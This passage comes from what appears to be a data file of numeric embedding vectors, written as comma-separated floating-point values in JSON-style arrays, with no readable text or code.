.012318742,0.017415697,-0.021386718,0.004541587,-0.011760483,-0.0037788441,-0.010335388,-0.007086617,-0.0015057453,-0.010821914,0.017906204,-0.001700012,-0.029332284,-0.013933479,0.019705331,0.013136552,0.0026689356,-0.019612642,-0.03390709,0.0039685853,-0.0062611424,0.0046845474,0.026198467,0.017749975,-0.02359745,-0.003829925,0.011270696,0.022677999,-0.019545164,0.019527592,0.00032407435,0.017211458,-0.015112848,0.0224323,-0.01744717,-0.018711567,-0.043122265,-0.007947693,-0.0031361855,-0.0024690125,-0.0018596099,-0.0057208063,0.017323898,-0.0113913035,0.029511489,-0.009765911,0.008711878,-0.003560393,-0.013045319,0.015724411,-0.03397866,-0.017948912,0.012554707,0.06550467,0.0031316113,-0.017978936,0.022696799,0.0045276396,0.00036248815,0.0089399265,-0.008965695,0.003717224,-0.010435671,-0.023586493,-0.008606658,-0.007929407,0.020285167,-0.019948311,0.014698592,0.0044560465,0.028235108,0.006093875,0.01894549,0.02068692,-0.02569643,-0.007258193,0.033780213,0.02677224,-0.009102547,0.0140808085,0.006151889,-0.019128587,0.004444532,-0.0028022556,-0.015239399,0.0047640083,0.007264908,-0.013411456,-0.034019254,-0.007901611,-0.008056868,-0.0058361976,-0.01701972,0.016424607,0.005488108,0.016869154,-0.008256734,-0.003941384,-0.017165005,-0.024114588,0.0042973943,0.02605921,-0.017897941,-0.0077263103,0.011950367,-0.00077105453,-0.017357385,-0.014593249,-0.0096419575,-0.007927147,-0.010160612,0.013567879,-0.006875049,0.020993585,-0.023489023,-0.01918945,-0.009404545,-0.021724803,0.005086004,-0.0016053092,0.007021962,0.012737758,0.010092334,-0.0076877032,-0.0025303855,-0.03277279,-0.0071781357,-0.0028709616,-0.0100249695,-0.0131116,-0.014659495,-0.018887797,0.020021081,0.010743048,0.0041355705,0.0075258063,0.002676864,-0.015598422,-0.025836363,-0.005192714,0.04059012,-0.022410238,-0.006518289,0.012560066,0.0019645998,0.04199172,0.00048565865,0.009936843,0.018258322,0.011346275,-0.0033356603,0.015486374,-0.0007755367,0.022231834,0.0007905161,-0.003208929,-0.01251598,-0.00039700125,-0.02576015,-0.0012107214,0.00555798,0.02265876,-0.010985821,-0.003147079,-0.010654702,0.004812893,-0.027914545,0.00523011,0.061450955,-0.0049037538,0.0047307643,0.039430507,-0.0029553233,-0.035834104,-0.007728757,0.0055150334,-0.0044993227,0.02421368,0.0019061296,0.01899991,0.006332307,-0.0027445564,0.006672595,-0.0071050473,0.017713979,0.007320452,0.012062746,0.0018182544,0.0021507645,0.0019938594,0.005529102,0.006880983,0.026651004,-0.030359758,-0.010447426,0.003829531,0.0013971307,-0.009825897,0.0046031214,0.010526258,0.003399608,-0.028824683,0.00016329465,-0.013656762,0.020090053,-0.0056636753,0.0088076005,0.022070883,0.021842564,-0.0047299447,-0.021125399,-0.018954651,-0.012990875,-0.0033882186,0.03870104,0.0020054833,-0.0165585,-0.015560983,0.01308016,0.02001084,-0.0058950763,0.022873295,0.00036340102,-0.011743562,-0.011668611,0.0075437212,-0.011833543,0.0053095235,0.002074575,-0.0021555182,0.0002428042,-0.020403655,-0.012469232,0.01143036,0.010841764,-0.003130226,0.0053820284,0.0048384774,0.027462687,-0.0036936228,0.0154751865,-0.0066377237,0.011569201,-0.001457226,0.025916135,-0.0020027875,-0.025000622,-0.00717969,-0.006053805,0.02054341,-0.023500394,0.0055945585,0.008546112,0.0040631555,0.01710945,-0.022389464,-0.035754986,0.012442977,-0.001504328,0.00882712,-0.005322332,0.024234178,0.0070283185,-0.0051280065,0.005181283,-0.00932653,0.011820146,0.0016427388,0.0029107265,0.0023737485,0.030223977,-0.015608712,-0.038013875,0.0040917424,-0.005585339,0.012191038,0.013172009,0.010156526,-0.028242273,-0.027522787,0.072861955,-0.008446722,-0.015199107,-0.026224473,0.022292709,0.032646712,-0.0052182544,0.0008802931,-0.006458327,-0.030762538,-0.011170196,-0.024234174,0.006138129,0.0015064985,-0.045129508,-0.016020108,0.029573252,-0.006519451,-0.008167749,0.004567348,0.0071438444,-0.011997171,0.028468711,-0.0072262674,-0.004390076,-0.050922967,-0.01598127,0.013728061,-0.019679805,0.009269638,0.00026198835,-0.032255787,-0.021586562,-0.0026027467,-0.027907223,0.00029416312,-0.007723148,-0.014327751,0.01784644,-0.008145201,0.022482723,0.00247536,0.014143362,-0.0028517835,0.0151512865,-0.011950751,0.0006833921,0.0019124335,0.0039717183,0.013084032,-0.022107275,0.009362612,0.029172648,0.001340153,-0.008280137,0.013344584,0.004175245,-0.0052665216,-0.0072318786,0.0008710705,0.007836587,-0.013729644,-0.020460479,-0.00981777,0.004174514,0.019748831,-0.0018353084,-0.018055554,0.0014447425,0.0010101242,-0.0128859505,0.018988319,0.012071612,0.01668481,0.009801738,-0.007848762,0.0014075211,0.0049365642,-0.0065892767,0.014453258,-0.012939962,0.011329305,-0.01336671,-0.023504691,0.009242089,0.0051811635,0.0015524526,0.00076735904,-0.011952806,0.016125392,0.031463917,-0.010056986,0.00893547,0.0086455,0.010659683,0.004645867,-0.0055645527,-0.040043965,0.0062207,-0.042665247,-0.011038653,-0.0010543213,-0.0153048495,-0.0016773542,-0.025529288,0.0014882975,-0.057951763,0.008009313,-0.027606871,0.0015704917,-0.013533033,-0.019439265,0.015238876,0.030182498,0.015978392,-0.031070182,0.013843043,0.026296774,0.011032829,0.0050329017,-0.029861964,0.0008011624,-0.01697327,-0.00889634,-0.0058526276,0.009180052,0.014515168,-0.015082834,0.010954257,0.0010616916,-0.0006060856,0.0029944694,-0.00685079,0.011906893,0.009830135,0.0046275696,0.0029426534,-0.017854702,-0.0026184698,0.027386786,0.031906497,0.009382515,-0.0012436636,0.00062489713,0.002567148,0.0037549087,0.006901479,-0.01423652,0.0040023066,-0.0016627776,0.0011249444,0.009848337,0.0016539587,0.019418478,0.014655151,0.017815031,-0.0015507005,-0.010090867,0.01700023,-0.007546226,0.022238666,-0.020778274,0.0060360436,0.015112333,0.01687598,-0.0028704286,-0.0096233785,0.010338548,0.006305946,0.0046463395,0.007575546,0.005778372,0.010445718,-0.0033858416,-0.02714296,0.0076211877,-0.030311652,0.014729002,-0.0017709797,0.0024387673,-0.002379663,0.0117574725,0.022827733,-0.0013010149,-0.018418461,0.023857748,-0.01383393,-0.019392464,-0.000240333,0.016590938,0.016658187,-0.018488387,0.0078063235,-0.0027550627,-0.021051284,0.001140727,0.010973287,0.0012548225,-0.009463937,-0.02032425,-0.0042518345,0.0038672853,0.007897356,-0.0011967976,-0.009688622,0.0021554735,-0.0016130417,-0.0115336245,-0.018988792,-0.02162715,-0.10437753,0.0002686145,0.022191739,-0.018384276,0.00814823,-0.018971162,0.008757421,0.0058443537,0.045120183,0.004755336,-0.006316393,0.0055844653,-0.018299276,0.013688751,0.00890094,0.00966763,-0.031379662,-0.0012781472,-0.00005740316,-0.008996389,-0.0093800565,-0.027922578,-0.0039022607,0.017700221,0.007855937,0.008379711,0.029521635,0.036774363,0.023108888,-0.017676555,-0.002172481,0.0020682889,-0.024393633,0.02162845,0.0093741035,-0.014034638,0.005123374,-0.010955449,-0.014606866,0.050072186,0.01837616,-0.005929061,0.015439068,0.03618785,0.0031574115,0.005172842,-0.02370644,0.014058192,-0.0003425545,0.011523535,0.013955004,-0.0066266153,-0.00074009143,-0.011672737,-0.0025722648,-0.0049354606,-0.0031668206,0.025241753,-0.0030479773,0.012309525,-0.011615455,0.014342253,-0.016110456,0.0044620032,-0.017282734,0.02685966,-0.023821944,0.018135585,0.009553881,0.009696394,0.0026339556,0.008531948,0.00883559,0.0015626259,0.024267271,-0.0004932521,0.019739661,0.028620083,0.005234966,0.0056120683,-0.002801278,-0.015778325,-0.0021732387,0.0008575862,-0.019842872,0.005455966,-0.0017410764,0.005094319,-0.0071877874,0.016105056,0.008776377,0.014567662,-0.029156677,-0.0011518128,0.009438144,0.008021758,0.046807837,0.005137921,-0.013990899,-0.028377827,-0.014415962,0.0058827936,-0.011237094,0.013959734,-0.040194493,0.023101272,0.014904538,0.0035628343,-0.0067338008,-0.0042200345,-0.00078192895,0.03678116,-0.022996148,0.015870014,0.010084954,0.013390739,-0.0029793966,-0.002183912,-0.00601245,0.0021339038,-0.0031711948,0.00023305054,0.010615459,-0.014104848,-0.0062767277,-0.014802111,-0.02146608,0.020368595,0.01021315,-0.030648705,-0.005747392,0.008134976,0.0011119294,-0.016520577,-0.004548261,0.0071838954,-0.0054922905,0.007368804,0.0036437865,0.03445332,-0.0057026804,0.0039004807,0.024366582,-0.01677236,0.014886614,0.027403655,-0.0051795547,-0.01394511,-0.023563778,0.011829023,0.002137933,-0.009297286,0.021906167,0.0056928373,0.015045502,0.009989191,-0.026583657,0.0038312238,-0.006743558,0.010951706,-0.011395493,0.010763423,0.034027774,-0.010123838,0.003993326,-0.016999263,0.008553343,0.0066399495,-0.0027396479,-0.016289452,-0.008036874,-0.013541356,0.018572034,-0.049047004,0.021719256,0.031398345,0.0470582,-0.0022304074,0.033290002,0.022117026,-0.017735902,-0.009408459,-0.014319069,-0.0041220784,0.0119357,0.019384438,-0.0066067064,0.008665014,-0.020211317,0.0015241974,0.036147613,0.014992551,-0.016547503,-0.013601131,0.0155405,0.0069808317,-0.000095439165,0.014490027,-0.006065612,-0.0017223657,-0.03199426,0.016193893,0.018449303,-0.021142453,0.0057878084,0.010835899,0.0007462231,0.023898985,0.023434663,-0.008909849,-0.012552574,0.012767716,-0.02372751,-0.015377251,0.007967307,0.021309197,0.013684874,-0.013119661,0.006185659,0.016753417,-0.0016383618,-0.013804159,0.008451498,-0.0046218103,0.00008904608,0.038328726,0.01254245,0.006434339,-0.022276774,-0.023894578,0.006702268,0.009589422,-0.0017053894,-0.00022051859,0.010973307,-0.017422779,0.010770512,0.0032230564,0.02259643,0.0005188711,0.015467482,-0.0017782166,0.018898943,0.026423585,0.026036488,-0.00076934986,0.01356216,0.0007261063,0.009689574,0.027358484,0.0043390314,-0.004423105,-0.007676794,-0.011256711,-0.017992316,0.016023917,0.004483648,0.0057476116,-0.022189166,0.0038638252,-0.015191556,0.0066084038,-0.009344231,-0.011520446,0.004769565,-0.010626391,0.000083081344,-0.01947765,-0.0007765615,0.021133548,0.0030829224,0.0070969053,-0.0011940703,0.02749425,0.0021372018,-0.020589411,-0.024676666,0.010140384,0.019245757,-0.0015090917,0.01262653,-0.01240102,-0.013806064,0.02419261,-0.0020282534,0.014895075,0.014019275,0.017269224,-0.012895386,-0.002500005,0.0009557803,-0.014449319,-0.013299983,-0.0011393012,0.0029785004,-0.0051314305,0.014898921,0.004065416,0.011619097,0.022724282,-0.0005577133,-0.02594017,0.01399173,0.014433471,0.036437687,-0.010016019,-0.0038016622,0.01791841,-0.008892581,-0.01041266,-0.027845085,0.002249164,-0.01127311,0.01978173,0.0037408907,-0.00091875036,-0.0040895054,0.0065703006,-0.027153073,-0.014341578,-0.009029585,-0.01833115,0.028588654,-0.009300829,-0.00731082,0.01948848,0.001739397,0.029479602,0.006548203,-0.009095852,0.02055091,0.007490206,-0.013937414,-0.0044657006,0.030898822,-0.0107905995,0.014472293,0.031057978,-0.014280543,0.014747476,0.0019034029,0.00806136,-0.0011120306,-0.019320466,-0.0063188006,0.014662614,0.0027938774,0.026217878,0.012174368,0.008495625,-0.0005956961,0.0043960204,0.0045053903,0.0044033937,-0.020107642,0.028514834,-0.024544012,-0.014577791,0.011511619,-0.0008850726,-0.010056436,0.007744131,0.0075092795,-0.02743964,0.0016091852,-0.0010854077,-0.021823216,0.012345426,-0.037243273,-0.011737731,-0.011492748,0.018993773,-0.017765678,-0.033558715,0.004852016,-0.0900401,0.004027033,0.010301784,0.018622922,0.04500645,-0.0015101824,-0.0151196355,0.005556686,-0.013627916,-0.005845624,-0.006577906,0.005909513,-0.024494503,0.016674748,0.032631762,0.0031516803,-0.0011628608,-0.010304032,0.013741384,-0.02952534,0.009945239,0.014786118,-0.014369216,-0.009550442,0.017516527,-0.008223088,-0.0140505005,-0.012313327,0.002275333,-0.014582074,-0.007847295,-0.004502445,-0.011717073,0.0065105613,-0.0035181523,0.002932106,-0.006528836,0.015454204,-0.017658109,-0.028541582,-0.016086126,0.00862704,0.0011614535,-0.013413258,-0.025920438,0.024062168,-0.02284205,0.0013695057,-0.0066247075,-0.0017534253,-0.012461191,0.009413107,-0.015874328,0.028783038,-0.010383278,0.019194683,-0.012482505,0.0052562663,0.034935094,0.0008021096,-0.025448292,0.0012655755,0.008859264,0.0008191504,0.0017227419,0.009293854,-0.000090704016,0.027655492,-0.007118143,-0.0101468805,0.023023566,-0.028029837,-0.0046278564,-0.013297925,-0.013317028,-0.004129478,0.014944825,-0.0031124195,-0.0006618826,0.010810899,0.02074279,-0.008125177,0.0048455927,0.004742978,0.026784198,0.020017605,-0.009488569,0.00008094497,0.032156255,0.0034201366,-0.0045961556,-0.0029469235,0.045416936,-0.0053095417,0.01125891,0.0067217713,0.0064053335,0.0030869597,-0.002610137,0.0040869773,0.013118257,0.011433963,-0.0053463494,-0.013994209,-0.014919032,0.014251105,-0.00053940446,-0.011288069,-0.009539995,0.00133709,0.00017801339,0.017823908,0.017477663,0.04857366,0.024999663,0.010671397,-0.014976334,0.008501265,0.0010851403,-0.022217683,-0.014559499,-0.016155634,-0.019215642,0.03222769,0.027920203,-0.0039062465,0.021493752,-0.009974454,-0.021621173,0.008808165,0.0025656307,0.016934164,0.020647708,0.008169828,-0.011651483,0.012312391,0.004328998,0.014505801,-0.0030739354,0.020001214,-0.0059807627,-0.03600156,0.011583276,-0.010097036,-0.0095348265,0.025900852,0.0026957481,-0.0014321448,0.013880901,-0.033525072,-0.004281129,-0.002826937,-0.0074316724,0.006329671,-0.0108050285,-0.0053576035,0.025586935,0.0026560135,-0.013411285,0.00222488,-0.0057676123,0.0017970315,0.014599684,-0.008708398,-0.031101564,0.0017158028,0.011926128,0.0075821793,-0.010239884,-0.0010829049,-0.01761929,-0.023495533,0.0036458971,-0.010032993,-0.010522247,-0.008697904,0.028762257,0.007251009,-0.011369217,0.011678488,-0.03897128,0.0003615988,-0.013887721,-0.02713266,0.0025551314,-0.020899236,-0.006539331,0.0017253194,0.01740885,-0.0254076,-0.0006627062,-0.012312739,-0.00047166823,-0.026044842,-0.0027167634,-0.018256877,0.0055195363,0.0030659407,0.00082794734,0.0069710854,0.011190259,0.00869636,-0.011540752,0.014980482,0.047008254,0.0046197493,-0.0036641422,0.0065272297,-0.018940795,0.0035791046,-0.018727876,0.023798916,0.03329024,0.098196834,-0.0030787217,0.0047083492,-0.00683234,0.015294436,0.00409295,0.0101367375,-0.012702613,0.006015571,0.010520505,0.016186599,-0.01613789,0.008846999,-0.002301656,0.0053867805,0.019872474,0.016439652,-0.030406449,0.0088187875,0.023005435,0.021986615,-0.020949712,0.005342661,-0.050476942,-0.0028829454,-0.07429341,0.03133205,0.029371742,-0.0075934604,0.02286453,0.019364612,0.0066213887,0.010361877,0.008114123,-0.01935137,0.006522884,0.008656552,-0.0038628012,-0.0072533055,-0.013771126,0.029374722,-0.011717367,-0.01134317,-0.002432505,-0.026913457,-0.017944746,0.0033078764,-0.01629692,-0.011074907,-0.0057179863,0.0153300725,-0.009636238,0.0044616694,-0.0049284087,0.008881331,-0.016038965,-0.00073748076,0.0056686,-0.0030604096,-0.011843966,0.017537897,0.01979462,0.0061512296,-0.004021989,-0.00012847895,0.009481832,0.004775876,-0.010548325,-0.00082733174,-0.017585546,0.010881397,-0.014559794,-0.00086216733,-0.016499331,0.0017331493,0.010869016,-0.010700328,-0.0103478525,0.018882966,-0.010169221,-0.0013624594,0.011504678,0.01377485,0.0002496333,0.024575638,0.008384013,-0.026340108,0.018193344,-0.015640365,-0.0032463556,-0.011885181,0.025756503,0.015488959,0.0035135767,-0.020201638,0.0091159195,0.0034770346,-0.0153445555,0.007970905,-0.008886001,-0.017407563,-0.020317303,-0.017733466,0.022922968,-0.01182509,0.005408306,0.0016750905,-0.00012318416,-0.015005149,-0.015822789,-0.009776074,0.017275617,0.004482906,0.019011274,0.0026241979,0.0505545,-0.0009534814,-0.014729655,0.02298718,-0.014163817,-0.0072394563,0.012622675,0.00893467,0.028155949,-0.008029431,0.01640344,-0.0055030133,-0.0055643236,-0.0061844024,-0.0065468205,-0.014278896,-0.04296335,0.008587796,0.025132662,0.004553833,0.01005484,0.035935666,-0.015006903,-0.009261524,-0.009888272,0.009797446,-0.016169192,-0.009713235,-0.00031904693,0.0072462577,-0.017672079,0.033977248,-0.016807884,0.0066194744,-0.012067112,0.012043426,0.024590882,-0.00403327,0.010749015,-0.024074098,-0.0021398698,-0.027150417,0.014139734,-0.00538286,-0.032152485,-0.0033163321,0.0018127956,0.0098276865,-0.06248663,0.027449844,0.0085707335,0.0055119456,0.012448263,0.010241023,0.014623876,-0.0085474495,-0.015311297,-0.0015280979,0.011392386,-0.00470217,0.009472109,0.014990594,0.0133209145,-0.016146444,-0.0047004865,0.014983045,0.0077553783,0.0019808712,-0.0092090005,0.013243333,-0.01286817,0.016173245,-0.01573312,-0.03122318,0.04915755,-0.0089539355,0.007471211,-0.002494624,-0.007341457,-0.016354356,0.017051654,-0.013951905,0.050028987,-0.017946547,-0.036437456,-0.008828546,0.0009354146,-0.003139344,0.011559422,0.006850464,-0.009425449,-0.002054287,-0.0321736,-0.019328926,-0.0021961478,0.02377207,0.0013260309,0.0008980043,-0.031226821,0.0061072013,-0.0056047896,-0.00887227,-0.029043946,-0.010206544,-0.0061931387,-0.003502492,-0.0073773265,-0.0071488936,-0.0070723947,-0.0098743,-0.001594472,-0.023766352,0.010489942,-0.0030181995,-0.042314954,-0.025597012,0.0057332492,0.01121333,0.0025266048,-0.011593567,0.00097542914,0.009908423,0.01577727,0.00032733814,-0.00039794587,-0.027192451,-0.006324951,0.015549249,-0.007873425,-0.009159254,0.0007239138,-0.010939815,-0.024071455,0.014230401,0.0019523536,-0.03210547,0.0107256435,-0.005840468,-0.028324755,-0.022394286,-0.0019992078,-0.0047639464,0.01804565,-0.00030908282,-0.0042223516,0.0052563185,0.008625787,-0.0054237386,0.002505528,0.0040682117,-0.013646118,0.025001355,-0.02438228,-0.020141566,-0.008990829,-0.007153181,0.0093053,-0.012703549,0.030915929,-0.012680805,0.019341445,-0.010680949,0.011677497,-0.01228695,0.0000038701,0.006333096,-0.026173294,-0.004293071,-0.013126766,0.0034110474,0.0012202149,-0.009969081,0.012655962,0.07143108,-0.03934608,-0.012879403,0.01530271,0.006289171,-0.029633505,0.025182318,0.009587319,-0.048190787,-0.02826173,0.011147276,-0.0015392698,-0.006446532,-0.028278392,0.0044333753,0.007155156,-0.0065152817,0.0062166248,0.015145555,-0.029353058,-0.007970319,-0.006612737,-0.035053577,-0.0010712108,-0.010073557,-0.008350535,-0.010206679,-0.012589288,0.006532186,0.0068379594,0.011263315,0.003939543,0.0059221424,-0.008211579,0.0033314566,0.014936982,0.012015927,0.015701978,0.0057233144,-0.02924763,-0.035692744,-0.0090020485,0.0012595198,0.0009924237,-0.002759567,-0.018611783,-0.020346234,0.016175969,0.003454021,0.1248389,0.006343021,0.01811489,0.00467875,0.00263168,-0.0015095404,0.01332695,0.019174315,0.016385237,0.012452852,0.02059628,-0.004176323,0.013161701,0.0058138547,-0.008511197,-0.009201964,-0.00081788434,0.13740061,-0.021261124,0.023551395,0.01596529,0.00491675,-0.013417542,0.018352749,0.0041134,-0.06463347,-0.020644126,-0.04789969,-0.0024077639,-0.001109015,-0.020528011,0.021138975,-0.003731905,0.0030834973,-0.020627031,0.009338833,0.009040499,-0.0063084965,-0.006673434,-0.016392214,0.042594608,-0.009642569,-0.0040363944,0.01684231,-0.0039330553,0.0044185543,-0.012705505,0.009686037,-0.0006803191,0.02538618,0.021305913,-0.0012148202,0.021982871,0.0027237423,0.018167289,-0.0083387485,0.013276609,-0.0061582113,-0.014174022,0.011161818,-0.012456993,0.010912447,0.006577002,0.015302127,-0.019983634,-0.0036119837,-0.010501975,-0.005360509,0.003442566,0.025085935,0.026382279,0.00706161,-0.012053879,-0.024074718,0.02678702,-0.018872077,-0.008463487,0.014019587,0.021393456,-0.010725245,0.028808363,0.026543647,-0.009938797,0.007811024,0.024700815,-0.0009648371,0.017980369,0.02028521,0.0143232,0.010433189,-0.006857714,-0.004255415,-0.01689775,0.016429234,-0.007522489,0.04272366,0.017373735,-0.0076340474,0.0023261518,-0.027043823,-0.0029496872,0.016468717,-0.00039232484,-0.007926564,-0.012063433,0.022988813,-0.0011064803,-0.03145048,-0.008435081,0.009256719,0.019696036,0.007467608,-0.013419495,0.020443529,-0.0016190507,-0.0029119626,-0.0013734812,-0.0010437513,-0.042999174,-0.0023117273,0.0078113,-0.007530433,0.00054875156,0.013281428,-0.030880274,0.0151819615,-0.003275094,0.031025734,-0.01291321,-0.00861386,-0.024754532,-0.005123547,-0.010621396,0.042480893,0.00022605367,-0.012265304,0.011477516,-0.033573598,-0.026080668,-0.024165614,0.007627119,0.018339219,0.008763315,0.023972802,-0.010292675,-0.0030434162,0.023605451,0.01689133],[-0.0013316004,0.025830524,-0.013703124,-0.00847918,-0.0052738874,-0.01994399,-0.016568074,0.031415064,-0.011765012,-0.013001863,0.011767992,0.028040687,0.0031723382,-0.018752651,-0.0127766365,0.0052283444,0.025443977,-0.009894078,0.013015687,-0.00063301297,0.002471258,-0.001692778,0.021233512,-0.024590753,0.00787732,-0.0023329603,-0.004587685,0.019032404,-0.0073310942,0.017390061,-0.0047629406,0.027772736,0.016464867,-0.0065278444,-0.014208223,0.0044604554,0.0060129897,-0.02134345,0.010485267,-0.011683617,-0.011081141,0.0028467698,0.023784231,0.011219117,-0.009241539,-0.009941537,0.0044834684,-0.00085158006,-0.013193905,0.0055707362,0.0046348767,-0.01801987,-0.03161107,0.008255888,-0.0074633206,0.036773976,0.012472429,-0.013598817,0.008640202,-0.009486312,-0.007937074,0.019946756,-0.0050944746,-0.015258842,0.014210013,-0.011546508,-0.003979538,0.0021037061,0.009417013,-0.03433096,-0.0032873803,-0.0004459849,0.010341198,0.014465959,0.0037871713,0.011613641,-0.00075093517,-0.024150165,-0.017905438,0.0024194017,-0.008592619,0.010549444,-0.024758138,-0.012733423,-0.014171973,-0.010188187,-0.016980298,-0.00868905,-0.011849464,-0.04579458,0.016852157,-0.0012589307,-0.008101448,0.0078120125,-0.018302318,0.027577732,0.022924628,0.004595436,-0.004050617,0.0013750829,-0.024504788,-0.020598952,-0.023012856,0.01039458,0.0042085615,-0.017752621,-0.0033299613,-0.0029432161,0.0020592832,0.006027549,-0.003004162,-0.0073930044,0.014631966,0.01469117,0.012517379,-0.011574184,-0.0035465395,0.015746035,0.0010439061,-0.012403885,0.016245214,-0.00019072127,0.021532176,-0.0018522171,-0.006830377,0.008219083,-0.020477947,0.004309794,0.0048366813,0.00039877836,0.008187849,-0.016826047,-0.009893358,-0.021734247,-0.012636061,0.003908249,-0.003057534,-0.014334851,0.0069165058,-0.020316383,0.028739896,-0.0155992415,-0.007145907,-0.014466082,0.039972875,0.0124214655,0.005213567,0.055245966,0.017792542,-0.0045455294,-0.005894755,0.0010079634,-0.011631574,-0.016217984,0.00396737,0.04411969,0.0042449026,0.011017957,-0.018123558,0.020802736,-0.028615275,0.000531954,0.016117139,-0.007941721,-0.015858566,-0.02626969,-0.008882061,0.007412855,-0.010269021,0.014880977,0.00793315,0.011184903,0.008274378,-0.0044967523,-0.007993939,0.012970695,0.0063002035,-0.010287282,-0.004769355,0.010736841,0.0057530617,0.023887672,0.0088534225,0.006617483,-0.013523113,0.009951068,0.016372237,-0.016984258,-0.022582838,0.0019290374,0.007609288,-0.010156398,-0.03166342,-0.012166541,-0.01131151,-0.0105834175,-0.0041474313,0.09556503,0.025877303,-0.00076250685,-0.008234682,0.008868009,0.002136846,-0.014202139,-0.006006428,-0.013255307,-0.020528555,-0.006584963,0.006638917,-0.002542156,0.008933967,0.014925793,-0.0028995245,0.016576452,0.0032850031,-0.07935135,0.012724731,0.008374572,-0.0022488353,-0.010482407,0.0062520714,0.0049140244,0.015034595,-0.015113487,0.012770026,-0.019667303,0.0022729046,-0.004053194,0.015260376,-0.04042685,0.0055710534,0.006275919,-0.010902548,-0.0038829762,-0.0026456825,-0.013300941,-0.0031672902,0.00042557428,0.0016947561,0.014597603,-0.0010850092,0.0050150435,0.01937189,0.03596051,-0.014047746,0.0117603745,0.03192146,-0.0025786466,-0.0057711606,0.014338515,0.028383369,-0.0009050696,0.022652026,0.0014532127,-0.012052712,-0.025265848,-0.013189063,-0.0019664199,-0.002436337,0.0056042536,0.013232106,0.022494568,0.0066135973,0.026992116,0.038062412,0.0014753663,0.030690433,-0.015569305,-0.014159759,-0.017290989,-0.00864105,-0.007398854,-0.017675752,-0.013176801,0.0029255585,0.008581054,0.011580965,0.012591917,0.005716551,-0.004965073,0.0026277096,-0.005631239,-0.00002604005,-0.0081330985,-0.008414193,0.008103454,-0.0038533832,-0.001509866,0.021845916,-0.0121987155,0.002815968,-0.000734805,0.012890829,0.010792823,-0.011499908,-0.009455688,-0.0017169949,-0.0069101793,-0.00076402025,-0.033875365,-0.0020808468,-0.007493342,0.023612836,0.0031669529,-0.011069821,-0.011245017,-0.005080905,0.039452426,-0.001223685,0.023326721,-0.010741609,-0.0123924,-0.021531763,-0.011048461,-0.00033809518,0.0012557139,0.0012187441,-0.014088288,-0.0036494292,0.01364185,0.024714597,-0.0067678746,0.018284347,-0.03607958,-0.010235016,0.012387341,-0.002295009,-0.021242669,-0.005278882,0.009222132,-0.02249091,0.02131535,0.030483108,0.01697023,0.00045996436,0.031037843,-0.018613588,0.018643267,0.013401178,0.02952341,-0.016942373,0.01043911,0.003443231,0.021923777,0.009131829,-0.001641089,-0.02394049,-0.0010226569,0.021232,0.005496545,0.025359167,0.005169319,0.015514712,-0.009403794,-0.035885785,-0.009585295,-0.011668026,-0.0017394617,0.000018926814,-0.012028401,0.004027665,0.011945042,-0.013715148,0.015135277,0.083160356,0.0109944055,0.000051321495,-0.0065447544,-0.029319353,-0.016389389,0.011975321,-0.00013067189,-0.0021714738,-0.0126451645,-0.008695311,-0.015846103,0.006899978,0.011272903,-0.010279803,0.024905501,-0.025985822,-0.018889623,-0.013759485,-0.029117797,0.039613236,-0.025956148,0.004305848,0.0066436194,0.011343198,0.024524601,-0.012293859,0.0016263714,-0.0061371154,-0.015004718,-0.01760259,-0.00637482,0.012864151,0.01150788,-0.031334028,0.03615428,0.01872294,-0.010965314,0.0049738893,0.0017799417,0.014367846,0.0026079395,-0.0024707192,0.00075416104,-0.013653544,0.03976779,0.00020773077,-0.0019630291,-0.013200938,0.0060486514,-0.017341327,0.021346154,-0.018093256,0.011297741,-0.01635113,0.029910013,0.012041677,-0.030954333,0.029145261,0.027348418,0.033042334,0.010113213,0.005848656,-0.011785715,0.021450944,0.033722404,-0.026178818,-0.014917825,-0.014686307,-0.013527558,-0.0013959508,0.009943877,-0.0074536325,0.0032501647,-0.01083847,0.017128654,-0.015494974,-0.0015925427,0.014470489,0.0042946334,0.0047566146,0.011332671,0.0058558527,-0.0095001515,-0.008828778,0.012157641,0.0060233017,0.031982057,0.0024313284,-0.012754691,0.004014193,0.021602312,-0.012397758,-0.0052793133,0.043943617,0.003646529,0.025031466,-0.0018502545,-0.026217127,-0.0044153556,0.005056303,-0.014843469,-0.021790087,-0.010666145,0.014017144,0.00032701297,0.017080976,-0.0041945702,0.00035411594,0.01940746,-0.01608362,0.00479613,0.015776148,-0.015105915,0.015413381,-0.01654808,0.0017280551,-0.019134594,-0.0112895,0.0017232499,0.014299363,0.016478356,0.0017776673,0.02131864,-0.026044924,0.006493422,-0.0058899177,-0.027427042,0.005966613,0.024249086,0.0054044616,0.038805228,0.0014973333,-0.04753625,0.017018951,-0.017782373,-0.0123720905,-0.03633599,0.022417936,0.015887061,0.009371787,0.012649087,0.037709977,-0.0065687606,0.00014620942,0.010855569,0.022778805,0.002828185,-0.020781524,-0.018591953,-0.0007399356,0.0028587421,-0.006393446,-0.028733933,0.015583757,0.010096213,0.00871338,-0.01792454,0.0132393185,0.019278433,0.025909077,-0.02791704,0.009407293,0.004609806,-0.010830893,0.00665627,0.020029161,0.016728317,-0.031323157,-0.016432209,-0.000040941322,-0.0022000982,0.00029847157,-0.024619266,0.0048636943,-0.027873516,0.009171365,0.006990794,0.012682134,0.0119233355,0.016660789,-0.032933604,-0.013897442,0.0012263512,0.0066493563,-0.010374368,0.003988132,0.0012574908,-0.011423801,-0.017705543,-0.025800722,-0.021815075,-0.0028249864,0.026358865,0.0027463266,-0.002497667,-0.01715365,-0.010790271,-0.020983852,0.0074920407,-0.0063145366,0.014339451,0.012980895,0.0026801145,-0.01700403,-0.029151848,0.029202977,-0.0027507893,0.0023498621,-0.0023531406,0.01309751,0.025161603,-0.014893452,0.0051567536,0.017136017,0.017594567,-0.0016371493,-0.019492839,0.02240508,0.0135528045,0.02878947,-0.018691014,0.0067430497,0.018771278,0.0011114705,0.014215483,0.018915333,-0.016378725,0.008870562,-0.0053152675,0.002786724,-0.007284028,-0.0035079666,0.00013722791,-0.0052186404,-0.00885399,-0.010100637,0.0008241498,0.006481731,0.0074248267,-0.010210415,0.03093365,0.00394203,-0.024541145,0.006217918,0.012371212,-0.0018977525,-0.022056198,0.009333882,-0.011681774,0.004284458,-0.0065976535,0.006348037,-0.012768006,-0.0058275815,0.0050653736,0.0016787667,0.016527865,-0.018202871,0.011648765,0.013507999,0.0066180388,-0.009202409,-0.02265754,-0.022083858,0.0046540075,0.005339849,-0.025787963,-0.004135464,-0.023844775,0.03187771,-0.006546281,-0.010449965,0.016503133,0.007002878,-0.005143878,-0.027123578,0.0009925903,-0.05505478,0.0038639882,-0.0065604537,0.011164503,-0.01345095,0.045970418,0.028345516,-0.0021696948,-0.0062829917,-0.000773357,-0.